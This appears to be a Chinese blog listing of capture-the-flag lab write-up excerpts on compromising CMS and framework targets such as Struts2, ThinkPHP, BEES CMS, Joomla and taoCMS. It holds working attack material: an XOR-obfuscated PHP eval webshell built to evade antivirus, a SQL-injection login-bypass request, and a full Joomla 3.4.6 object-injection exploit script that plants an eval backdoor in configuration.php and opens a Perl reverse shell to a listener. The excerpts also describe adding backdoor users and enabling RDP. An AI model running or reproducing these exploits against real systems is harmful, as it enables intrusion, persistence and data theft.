Cyberstrikelab-SweetCake
Struts2 8888端口开放,发现版本信息,根据提示说有Struts2框架 文件上传那个漏洞用不了,扫一下目录扫出来/S2 直接上综合利用工具,可以命令执行 上传一句话木马 连接成功 权限不够查看flag,上传cs免杀马好像不太行,我这里先上msf,原因是 目标机器有防火墙,所以这里只能用定向,上去之后记得关掉防火墙 先拿第一个flag 开启RDP,添加后门 ...
Posts
共有218篇文章Cyberstrikelab-TengSnake
EmpireCMS 进入80端口发现帝国CMS,版本是7.5 来到/e/admin/index.php是后台登录地址,使用弱口令:admin/admin,猜测认证码是cslab(最多尝试五次,然后锁定一小时,有点坑哦) 上传一个mod文件 ...
Cyberstrikelab-Thunder
ThinkPHP 进入80端口,用工具直接getshell 生成的后门很快会被查杀,因此可以写入一个免杀木马 <?php function xorEncryptDecrypt($data, $key) { $keyLength = strlen($key); $result = ''; for ($i = 0; $i < strlen($data); $i++) { $keyChar = $key[$i % $keyLength]; $result .= chr(ord($data[$i]) ^ ord($keyChar)); } return $result; } $originalData = $_REQUEST["a"]; $key = $_REQUEST["b"]; $encryptedData = xorEncryptDecrypt($originalData, $key); $decryptedData = xorEncryptDecrypt($encryptedData, $key); echo @eval($decryptedData); ?> //密码是a 根目录拿到flag1 上传免杀CS木马,然后sweetpotato提权到system 开启RDP,添加后门 ...
Cyberstrikelab-Lab9
CMSeasy 进入80端口,发现CMSeasy服务 并且在网页源码中发现版本信息 使用弱密码:admin/admin123456来到后台,编辑模板发现有PHP代码 可以在index这里添加一句话木马 可以成功写入,连接蚁剑后在根目录拿到flag1 普通的一句话好像还连不起,随便找了一个一句话木马 ...
Cyberstrikelab-Lab7
BageCMS fscan扫描到9652端口运行着CMS,版本大概率是3.1 进入/index.php?r=admini,通过弱密码:admin/admin123456进入到后台,编辑模板添加一句话木马 连接蚁剑,在根目录拿到flag1 开启RDP,添加后门用户 ...
Cyberstrikelab-Lab8
ZZZMCS 直接访问80端口,进入/admin登录界面,使用弱密码admin/admin123456进入到后台 来到模板管理随便编辑一个html 如下图添加 成功写入木马 连接蚁剑,在根目录拿到flag1 不过当前并不是system权限,好像直接通过蚁剑传马会超时,这里我开的http服务来下载 目标主机上有杀软,直接生成的cs木马会被直接杀掉,这里我用这个插件 ...
Cyberstrikelab-Lab5
BEES CMS fscan扫描到6582端口 经过搜索发现后台登录的用户名处存在SQL注入 通过联合注入伪造登录 user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dd18&submit=true&submit.x=0&submit.y=0 在后台进行上传文件 连接成功,在根目录拿到flag1 上线cs,开启RDP,添加后门用户 ...
Cyberstrikelab-Lab6
Joomla 进入80端口,发现是joomla 使用扫描工具joomscan得到版本信息是3.4.6 #!/usr/bin/env python3 import requests from bs4 import BeautifulSoup import sys import string import random import argparse from termcolor import colored PROXS = {'http':'127.0.0.1:8080'} PROXS = {} def random_string(stringLength): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) backdoor_param = random_string(50) def print_info(str): print(colored("[*] " + str,"cyan")) def print_ok(str): print(colored("[+] "+ str,"green")) def print_error(str): print(colored("[-] "+ str,"red")) def print_warning(str): print(colored("[!!] " + str,"yellow")) def get_token(url, cook): token = '' resp = requests.get(url, cookies=cook, proxies = PROXS) html = BeautifulSoup(resp.text,'html.parser') # csrf token is the last input for v in html.find_all('input'): csrf = v csrf = csrf.get('name') return csrf def get_error(url, cook): resp = requests.get(url, cookies = cook, proxies = PROXS) if 'Failed to decode session object' in resp.text: #print(resp.text) return False #print(resp.text) return True def get_cook(url): resp = requests.get(url, proxies=PROXS) #print(resp.cookies) return resp.cookies def gen_pay(function, command): # Generate the payload for call_user_func('FUNCTION','COMMAND') template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' #payload = command + ' || $a=\'http://wtf\';' payload = 'http://l4m3rz.l337/;' + command # Following payload will append an eval() at the enabled of the configuration file #payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';' function_len = len(function) final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function))) return final def make_req(url , object_payload): # just make a req with object print_info('Getting Session Cookie ..') cook = get_cook(url) print_info('Getting CSRF Token ..') csrf = get_token( url, cook) user_payload = '\\0\\0\\0' * 9 padding = 'AAA' # It will land at this padding working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}' clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects inj_object = '";' inj_object += object_payload inj_object += 's:6:"return";s:102:' # end the object with the 'return' part password_payload = padding + inj_object params = { 'username': user_payload, 'password': password_payload, 'option':'com_users', 'task':'user.login', csrf :'1' } print_info('Sending request ..') resp = requests.post(url, proxies = PROXS, cookies = cook,data=params) return resp.text def get_backdoor_pay(): # This payload will backdoor the the configuration .PHP with an eval on POST request function = 'assert' template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # payload = command + ' || $a=\'http://wtf\';' # Following payload will append an eval() at the enabled of the configuration file payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';' function_len = len(function) final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function))) return final def check(url): check_string = random_string(20) target_url = url + 'index.php/component/users' html = make_req(url, gen_pay('print_r',check_string)) if check_string in html: return True else: return False def ping_backdoor(url,param_name): res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS) if 'PWNED' in res.text: return True return False def execute_backdoor(url, payload_code): # Execute PHP code from the backdoor res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS) print(res.text) def exploit(url, lhost, lport): # Exploit the target # Default exploitation will append en eval function at the end of the configuration.pphp # as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters') # e.g. get_payload('system','rm -rf /') # First check that the backdoor has not been already implanted target_url = url + 'index.php/component/users' make_req(target_url, get_backdoor_pay()) if ping_backdoor(url, backdoor_param): print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param) print_info('Now it\'s time to reverse, trying with a system + perl') execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-t','--target',required=True,help='Joomla Target') parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only') parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit') parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP') parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port') args = vars(parser.parse_args()) url = args['target'] if(check(url)): print_ok('Vulnerable') if args['exploit']: exploit(url, args['lhost'], args['lport']) else: print_info('Use --exploit to exploit it') else: print_error('Seems NOT Vulnerable ;/') 运行一下生成后门 连接蚁剑,根目录拿到flag1 上线cs并且开启RDP,添加后门用户 ...
Cyberstrikelab-Lab4
BlueCMS fscan扫描到192.168.10.10:5820端口开放,并且运行了Bluecms,并且版本是v1.6 进入到/admin管理员登录界面,尝试弱密码登录成功:admin/admin123456 来到模板管理,编辑第一个进行抓包 添加一句话木马,修改一下文件名,连接成功,在根目录拿到flag1 已经是最高权限了,直接上线CS 添加后门用户以及开启RDP ...
Cyberstrikelab-Lab3
CMS fscan扫描到3590端口运行了taoCMS 用dirsearch扫描一下目录 [root@Hacking] /home/kali/lab3 ❯ dirsearch -u http://192.168.10.10:3590/ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://192.168.10.10:3590/ [04:11:00] Scanning: [04:11:18] 301 - 240B - /ADMIN -> http://192.168.10.10:3590/ADMIN/ [04:11:18] 301 - 240B - /Admin -> http://192.168.10.10:3590/Admin/ [04:11:18] 301 - 240B - /admin -> http://192.168.10.10:3590/admin/ [04:11:18] 200 - 77B - /admin%20/ [04:11:18] 301 - 241B - /admin. -> http://192.168.10.10:3590/admin./ [04:11:19] 200 - 77B - /Admin/ [04:11:19] 200 - 77B - /admin/ [04:11:19] 200 - 66B - /admin/admin.php [04:11:20] 200 - 77B - /admin/index.php [04:11:32] 200 - 0B - /api.php [04:11:37] 200 - 0B - /config.php [04:11:38] 301 - 239B - /data -> http://192.168.10.10:3590/data/ [04:11:44] 200 - 894B - /favicon.ico [04:11:50] 200 - 0B - /include/ [04:11:50] 301 - 242B - /include -> http://192.168.10.10:3590/include/ [04:11:50] 200 - 4KB - /index.php [04:11:50] 200 - 4KB - /index.pHp [04:11:50] 200 - 4KB - /index.php. [04:11:51] 200 - 740B - /install.php [04:11:51] 200 - 740B - /install.php?profile=default [04:11:51] 404 - 0B - /index.php/login/ [04:11:53] 200 - 1KB - /LICENSE [04:11:53] 200 - 1KB - /license [04:12:04] 200 - 2KB - /README.MD [04:12:04] 200 - 2KB - /README.md [04:12:04] 200 - 2KB - /readme.md [04:12:04] 200 - 2KB - /ReadMe.md [04:12:04] 200 - 2KB - /Readme.md [04:12:05] 200 - 977B - /rss.php [04:12:11] 301 - 243B - /template -> http://192.168.10.10:3590/template/ Task Completed 尝试爆破密码失败,经过搜索得到默认的用户凭证:admin/tao,来到文件管理界面添加后门 连接成功 根目录拿到flag1,并且上线msf,可以看到是最高权限 并且上线cs 拿一下哈希 ...